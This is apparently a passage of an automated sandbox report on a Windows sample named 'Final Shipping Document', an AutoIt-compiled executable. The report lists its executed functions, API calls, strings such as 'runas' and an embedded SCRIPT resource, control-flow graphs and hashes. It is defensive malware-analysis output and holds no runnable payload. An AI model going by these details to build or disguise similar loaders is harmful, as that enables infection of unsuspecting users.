100609->100560 100610->100560 100612 be046a 100611->100612 100613 be0450 100611->100613 100657 be03bf 100612->100657 100613->100612 100664 bcf2d9 20 API calls __dosmaperr 100613->100664 100616 be045f 100665 bd27ec 26 API calls __wsopen_s 100616->100665 100618 be04a2 100619 be04d1 100618->100619 100666 bcf2d9 20 API calls __dosmaperr 100618->100666 100622 be0524 100619->100622 100668 bcd70d 26 API calls 2 library calls 100619->100668 100622->100564 100622->100565 100623 be051f 100623->100622 100625 be059e 100623->100625 100624 be04c6 100667 bd27ec 26 API calls __wsopen_s 100624->100667 100669 bd27fc 11 API calls _abort 100625->100669 100628 be05aa 100630 bd522d BuildCatchObjectHelperInternal 100629->100630 100672 bd2f5e EnterCriticalSection 100630->100672 100632 bd5234 100633 bd5259 100632->100633 100638 bd52c7 EnterCriticalSection 100632->100638 100641 bd527b 100632->100641 100676 bd5000 21 API calls 3 library calls 100633->100676 100636 bd52a4 __wsopen_s 100636->100568 100637 bd525e 100637->100641 100677 bd5147 EnterCriticalSection 100637->100677 100639 bd52d4 LeaveCriticalSection 100638->100639 100638->100641 100639->100632 100673 bd532a 100641->100673 100642->100582 100643->100569 100644->100599 100645->100575 100646->100569 100647->100588 100648->100569 100649->100584 100650->100591 100651->100590 100652->100592 100653->100595 100654->100602 100655->100606 100656->100603 100660 be03d7 100657->100660 100658 be03f2 100658->100618 100660->100658 100670 bcf2d9 20 API calls __dosmaperr 100660->100670 100661 be0416 100671 bd27ec 26 API calls __wsopen_s 100661->100671 100663 be0421 100663->100618 100664->100616 100665->100612 100666->100624 100667->100619 100668->100623 100669->100628 100670->100661 100671->100663 100672->100632 100678 bd2fa6 LeaveCriticalSection 100673->100678 100675 bd5331 100675->100636 100676->100637 100677->100641 100678->100675

                                                            Executed Functions

                                                            Function 00BA42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235libraryloaderCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 234 ba42de-ba434d call baa961 GetVersionExW call ba6b57 239 be3617-be362a 234->239 240 ba4353 234->240 242 be362b-be362f 239->242 241 ba4355-ba4357 240->241 243 ba435d-ba43bc call ba93b2 call ba37a0 241->243 244 be3656 241->244 245 be3632-be363e 242->245 246 be3631 242->246 263 be37df-be37e6 243->263 264 ba43c2-ba43c4 243->264 250 be365d-be3660 244->250 245->242 247 be3640-be3642 245->247 246->245 247->241 249 be3648-be364f 247->249 249->239 252 be3651 249->252 253 ba441b-ba4435 GetCurrentProcess IsWow64Process 250->253 254 be3666-be36a8 250->254 252->244 256 ba4437 253->256 257 ba4494-ba449a 253->257 254->253 258 be36ae-be36b1 254->258 260 ba443d-ba4449 256->260 257->260 261 be36db-be36e5 258->261 262 be36b3-be36bd 258->262 265 ba444f-ba445e LoadLibraryA 260->265 266 be3824-be3828 GetSystemInfo 260->266 270 be36f8-be3702 261->270 271 be36e7-be36f3 261->271 267 be36bf-be36c5 262->267 268 be36ca-be36d6 262->268 272 be37e8 263->272 273 be3806-be3809 263->273 264->250 269 ba43ca-ba43dd 264->269 278 ba449c-ba44a6 GetSystemInfo 265->278 279 ba4460-ba446e GetProcAddress 265->279 267->253 268->253 280 be3726-be372f 269->280 281 ba43e3-ba43e5 269->281 274 be3704-be3710 270->274 275 be3715-be3721 270->275 271->253 282 be37ee 272->282 276 be380b-be381a 273->276 277 be37f4-be37fc 273->277 274->253 275->253 276->282 285 be381c-be3822 276->285 277->273 287 ba4476-ba4478 278->287 279->278 286 ba4470-ba4474 GetNativeSystemInfo 279->286 283 be373c-be3748 280->283 284 be3731-be3737 280->284 288 ba43eb-ba43ee 281->288 289 be374d-be3762 281->289 282->277 283->253 284->253 285->277 286->287 294 ba447a-ba447b FreeLibrary 287->294 295 ba4481-ba4493 287->295 290 ba43f4-ba440f 288->290 291 be3791-be3794 288->291 292 be376f-be377b 289->292 293 be3764-be376a 289->293 296 be3780-be378c 290->296 297 ba4415 290->297 291->253 298 be379a-be37c1 291->298 292->253 293->253 294->295 296->253 297->253 299 be37ce-be37da 298->299 300 be37c3-be37c9 298->300 299->253 300->253
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 00BA430D
                                                              • Part of subcall function 00BA6B57: _wcslen.LIBCMT ref: 00BA6B6A
                                                            • GetCurrentProcess.KERNEL32(?,00C3CB64,00000000,?,?), ref: 00BA4422
                                                            • IsWow64Process.KERNEL32(00000000,?,?), ref: 00BA4429
                                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00BA4454
                                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00BA4466
                                                            • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00BA4474
                                                            • FreeLibrary.KERNEL32(00000000,?,?), ref: 00BA447B
                                                            • GetSystemInfo.KERNEL32(?,?,?), ref: 00BA44A0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                            • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                            • API String ID: 3290436268-3101561225
                                                            • Opcode ID: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
                                                            • Instruction ID: 5a827c6c20eeb1e3bf1b46455a2c64685be6b4cee80763da5124aa17cc3f121c
                                                            • Opcode Fuzzy Hash: 645464ad87388bf772f681e67cad357595e00f5eb0fdddfb93dd3d8095b5c009
                                                            • Instruction Fuzzy Hash: 33A1AF7691E2C0CFCB11CB6D688679D7EE4AB67700B0C48D9E88D97B72D7604A84CB21
                                                            Function 00BA42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 661 ba42a2-ba42ba CreateStreamOnHGlobal 662 ba42da-ba42dd 661->662 663 ba42bc-ba42d3 FindResourceExW 661->663 664 ba42d9 663->664 665 be35ba-be35c9 LoadResource 663->665 664->662 665->664 666 be35cf-be35dd SizeofResource 665->666 666->664 667 be35e3-be35ee LockResource 666->667 667->664 668 be35f4-be35fc 667->668 669 be3600-be3612 668->669 669->664
                                                            APIs
                                                            • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42B2
                                                            • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00BA50AA,?,?,00000000,00000000), ref: 00BA42C9
                                                            • LoadResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35BE
                                                            • SizeofResource.KERNEL32(?,00000000,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20), ref: 00BE35D3
                                                            • LockResource.KERNEL32(00BA50AA,?,?,00BA50AA,?,?,00000000,00000000,?,?,?,?,?,?,00BA4F20,?), ref: 00BE35E6
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                            • String ID: SCRIPT
                                                            • API String ID: 3051347437-3967369404
                                                            • Opcode ID: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
                                                            • Instruction ID: a6dd6a417527cd41f70e930dbdcfcad3f3c5ec40e13291b6ccc8d200e9fce0c5
                                                            • Opcode Fuzzy Hash: 5f6c4f637b9f840993261accb0167effb3a53e39a22e77ae0e67e074ea5dd6bb
                                                            • Instruction Fuzzy Hash: 44118E71250700BFDB258B65DC88F2B7BF9EBC6B51F1081A9F412E6290DBB1DC048720
                                                            Function 00BE2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00BA2B6B
                                                              • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                              • Part of subcall function 00BA9CB3: _wcslen.LIBCMT ref: 00BA9CBD
                                                            • GetForegroundWindow.USER32(runas,?,?,?,?,?,00C62224), ref: 00BE2C10
                                                            • ShellExecuteW.SHELL32(00000000,?,?,00C62224), ref: 00BE2C17
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                            • String ID: runas
                                                            • API String ID: 448630720-4000483414
                                                            • Opcode ID: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
                                                            • Instruction ID: da9943d95218873ea81f685ee95af72df766417e60de403edff8d5f47a53db72
                                                            • Opcode Fuzzy Hash: 4f53dcd8b7b9e7630a0d38c92ba75189e7f61be491dfdb70a3dd716b452c4e5c
                                                            • Instruction Fuzzy Hash: 8E11D63110C3415BCB14FF68D891ABE77E4DB93750F4854ADF586520A2DF21894A9712
                                                            Function 00C0DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(?,00BE5222), ref: 00C0DBCE
                                                            • GetFileAttributesW.KERNELBASE(?), ref: 00C0DBDD
                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00C0DBEE
                                                            • FindClose.KERNEL32(00000000), ref: 00C0DBFA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: FileFind$AttributesCloseFirstlstrlen
                                                            • String ID:
                                                            • API String ID: 2695905019-0
                                                            • Opcode ID: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                            • Instruction ID: fe24c1004dd8a196e86a7f776994fada3b88bdc3eb72679568397f8a9043aff6
                                                            • Opcode Fuzzy Hash: aa34bcdc64dc46a3e0b6d0a38e49bf4ebf163754b71cfac8dbf0e209ae7e63b6
                                                            • Instruction Fuzzy Hash: F2F0A03182092057D3206BB8AC4DAAF3B6C9E01334B104702F836D20F0EBB15A54CA95
                                                            Function 00BAD730 Relevance: 21.6, APIs: 14, Instructions: 616windowsleeptimeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetInputState.USER32 ref: 00BAD807
                                                            • timeGetTime.WINMM ref: 00BADA07
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB28
                                                            • TranslateMessage.USER32(?), ref: 00BADB7B
                                                            • DispatchMessageW.USER32(?), ref: 00BADB89
                                                            • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00BADB9F
                                                            • Sleep.KERNEL32(0000000A), ref: 00BADBB1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                            • String ID:
                                                            • API String ID: 2189390790-0
                                                            • Opcode ID: 4d633c1a249b004e905098568b870dcf08638db304f1647e891833d6de5a7194
                                                            • Instruction ID: 0e159acf8913b425c1f7fcddb3605f0f61d277c70c8426d6c6fb1c317c2febd5
                                                            • Opcode Fuzzy Hash: 4d633c1a249b004e905098568b870dcf08638db304f1647e891833d6de5a7194
                                                            • Instruction Fuzzy Hash: 0642D270608245EFD724CF24C885BBEB7E0FF46314F548A99E956876A1D770E888CB92
                                                            Function 00BA2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BA2D07
                                                            • RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                            • InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                            • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                            • LoadIconW.USER32(000000A9), ref: 00BA2D85
                                                            • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                            • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                            • API String ID: 2914291525-1005189915
                                                            • Opcode ID: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                            • Instruction ID: 1db19bc23099b8cbce6645c38330fe09e18854f7c3ef2235aeac71814e8b2a6f
                                                            • Opcode Fuzzy Hash: 89dff7ec86aa9627b16f3e70ca84627a8e5f26b2b299b929abc9c2d3c388d880
                                                            • Instruction Fuzzy Hash: A621C4B5921319AFDB00DFA8EC89BDDBBB4FB08700F04411AFA15B62A0D7B54584CFA1
                                                            Function 00BE065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 302 be065b-be068b call be042f 305 be068d-be0698 call bcf2c6 302->305 306 be06a6-be06b2 call bd5221 302->306 313 be069a-be06a1 call bcf2d9 305->313 311 be06cb-be0714 call be039a 306->311 312 be06b4-be06c9 call bcf2c6 call bcf2d9 306->312 321 be0716-be071f 311->321 322 be0781-be078a GetFileType 311->322 312->313 323 be097d-be0983 313->323 327 be0756-be077c GetLastError call bcf2a3 321->327 328 be0721-be0725 321->328 324 be078c-be07bd GetLastError call bcf2a3 CloseHandle 322->324 325 be07d3-be07d6 322->325 324->313 339 be07c3-be07ce call bcf2d9 324->339 330 be07df-be07e5 325->330 331 be07d8-be07dd 325->331 327->313 328->327 332 be0727-be0754 call be039a 328->332 336 be07e9-be0837 call bd516a 330->336 337 be07e7 330->337 331->336 332->322 332->327 345 be0839-be0845 call be05ab 336->345 346 be0847-be086b call be014d 336->346 337->336 339->313 345->346 351 be086f-be0879 call bd86ae 345->351 352 be087e-be08c1 346->352 353 be086d 346->353 351->323 355 be08e2-be08f0 352->355 356 be08c3-be08c7 352->356 353->351 359 be097b 355->359 360 be08f6-be08fa 355->360 356->355 358 be08c9-be08dd 356->358 358->355 359->323 360->359 361 be08fc-be092f CloseHandle call be039a 360->361 364 be0963-be0977 361->364 365 be0931-be095d GetLastError call bcf2a3 call bd5333 361->365 364->359 365->364
                                                            APIs
                                                              • Part of subcall function 00BE039A: CreateFileW.KERNELBASE(00000000,00000000,?,00BE0704,?,?,00000000,?,00BE0704,00000000,0000000C), ref: 00BE03B7
                                                            • GetLastError.KERNEL32 ref: 00BE076F
                                                            • __dosmaperr.LIBCMT ref: 00BE0776
                                                            • GetFileType.KERNELBASE(00000000), ref: 00BE0782
                                                            • GetLastError.KERNEL32 ref: 00BE078C
                                                            • __dosmaperr.LIBCMT ref: 00BE0795
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BE07B5
                                                            • CloseHandle.KERNEL32(?), ref: 00BE08FF
                                                            • GetLastError.KERNEL32 ref: 00BE0931
                                                            • __dosmaperr.LIBCMT ref: 00BE0938
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                            • String ID: H
                                                            • API String ID: 4237864984-2852464175
                                                            • Opcode ID: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                            • Instruction ID: dd7f728e3958d2194c2cc81d58a96596140589a5693ad5fa8f40b78accd84a3f
                                                            • Opcode Fuzzy Hash: 371a11f128b02b2610d3055cb4f15cae8445f60cf40bc5c86177501ac23e539f
                                                            • Instruction Fuzzy Hash: 58A12732A241858FDF19AF68D891BAD7BE1EB06320F24019DF815AF391D7719C52CB91
                                                            Function 00BA344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                              • Part of subcall function 00BA3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00C71418,?,00BA2E7F,?,?,?,00000000), ref: 00BA3A78
                                                              • Part of subcall function 00BA3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00BA3379
                                                            • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00BA356A
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00BE318D
                                                            • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00BE31CE
                                                            • RegCloseKey.ADVAPI32(?), ref: 00BE3210
                                                            • _wcslen.LIBCMT ref: 00BE3277
                                                            • _wcslen.LIBCMT ref: 00BE3286
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                            • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                            • API String ID: 98802146-2727554177
                                                            • Opcode ID: 40ca2c43fab6c4d690588c6cc10d2a9e7043fd14ee00cbf494ecdd7975d3ec9b
                                                            • Instruction ID: 1cb656bf6837cd50c13a6efe6eb9a0c68239e14e2f39c544110a232966deea75
                                                            • Opcode Fuzzy Hash: 40ca2c43fab6c4d690588c6cc10d2a9e7043fd14ee00cbf494ecdd7975d3ec9b
                                                            • Instruction Fuzzy Hash: C3716C714083019EC714DF65DC86AAFBBE8FF85740F40486EF589971B0EB749A88CB62
                                                            Function 00BA2B83 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            APIs
                                                            • GetSysColorBrush.USER32(0000000F), ref: 00BA2B8E
                                                            • LoadCursorW.USER32(00000000,00007F00), ref: 00BA2B9D
                                                            • LoadIconW.USER32(00000063), ref: 00BA2BB3
                                                            • LoadIconW.USER32(000000A4), ref: 00BA2BC5
                                                            • LoadIconW.USER32(000000A2), ref: 00BA2BD7
                                                            • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00BA2BEF
                                                            • RegisterClassExW.USER32(?), ref: 00BA2C40
                                                              • Part of subcall function 00BA2CD4: GetSysColorBrush.USER32(0000000F), ref: 00BA2D07
                                                              • Part of subcall function 00BA2CD4: RegisterClassExW.USER32(00000030), ref: 00BA2D31
                                                              • Part of subcall function 00BA2CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00BA2D42
                                                              • Part of subcall function 00BA2CD4: InitCommonControlsEx.COMCTL32(?), ref: 00BA2D5F
                                                              • Part of subcall function 00BA2CD4: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00BA2D6F
                                                              • Part of subcall function 00BA2CD4: LoadIconW.USER32(000000A9), ref: 00BA2D85
                                                              • Part of subcall function 00BA2CD4: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00BA2D94
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                                            • Associated: 00000000.00000002.2038165737.0000000000BA0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C3C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038432839.0000000000C62000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038492576.0000000000C6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.2038513874.0000000000C74000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_ba0000_Final Shipping Document.jbxd
                                                            Similarity
                                                            • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                            • String ID: #$0$AutoIt v3
                                                            • API String ID: 423443420-4155596026
                                                            • Opcode ID: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                            • Instruction ID: b9479b51329311dbee1999ce43af53599c62661c670dfda503b6c095f151123f
                                                            • Opcode Fuzzy Hash: 13d06ffe798a7e246abf685aada5fb68d022afb327a9cc8f1e60060a6e5428c0
                                                            • Instruction Fuzzy Hash: FC212C75E10314ABDB109FA9EC95BAD7FB8FB48B50F08405AFA08B66B0D7B14584CF90
                                                            Function 00BA3170 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 145windowtimeregistryCOMMON
                                                            Download Yara Rule

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 443 ba3170-ba3185 444 ba3187-ba318a 443->444 445 ba31e5-ba31e7 443->445 447 ba31eb 444->447 448 ba318c-ba3193 444->448 445->444 446 ba31e9 445->446 449 ba31d0-ba31d8 DefWindowProcW 446->449 450 be2dfb-be2e23 call ba18e2 call bbe499 447->450 451 ba31f1-ba31f6 447->451 452 ba3199-ba319e 448->452 453 ba3265-ba326d PostQuitMessage 448->453 456 ba31de-ba31e4 449->456 486 be2e28-be2e2f 450->486 458 ba31f8-ba31fb 451->458 459 ba321d-ba3244 SetTimer RegisterWindowMessageW 451->459 454 be2e7c-be2e90 call c0bf30 452->454 455 ba31a4-ba31a8 452->455 457 ba3219-ba321b 453->457 454->457 480 be2e96 454->480 462 ba31ae-ba31b3 455->462 463 be2e68-be2e77 call c0c161 455->463 457->456 466 be2d9c-be2d9f 458->466 467 ba3201-ba3214 KillTimer call ba30f2 call ba3c50 458->467 459->457 464 ba3246-ba3251 CreatePopupMenu 459->464 469 be2e4d-be2e54 462->469 470 ba31b9-ba31be 462->470 463->457 464->457 472 be2dd7-be2df6 MoveWindow 466->472 473 be2da1-be2da5 466->473 467->457 469->449 483 be2e5a-be2e63 call c00ad7 469->483 478 ba3253-ba3263 call ba326f 470->478 479 ba31c4-ba31ca 470->479 472->457 481 be2dc6-be2dd2 SetFocus 473->481 482 be2da7-be2daa 473->482 478->457 479->449 479->486 480->449 481->457 482->479 487 be2db0-be2dc1 call ba18e2 482->487 483->449 486->449 491 be2e35-be2e48 call ba30f2 call ba3837 486->491 487->457 491->449
                                                            APIs
                                                            • DefWindowProcW.USER32(?,?,?,?,?,?,?,?,?,00BA316A,?,?), ref: 00BA31D8
                                                            • KillTimer.USER32(?,00000001,?,?,?,?,?,00BA316A,?,?), ref: 00BA3204
                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00BA3227
                                                            • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,00BA316A,?,?), ref: 00BA3232
                                                            • CreatePopupMenu.USER32 ref: 00BA3246
                                                            • PostQuitMessage.USER32(00000000), ref: 00BA3267
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.2038199155.0000000000BA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
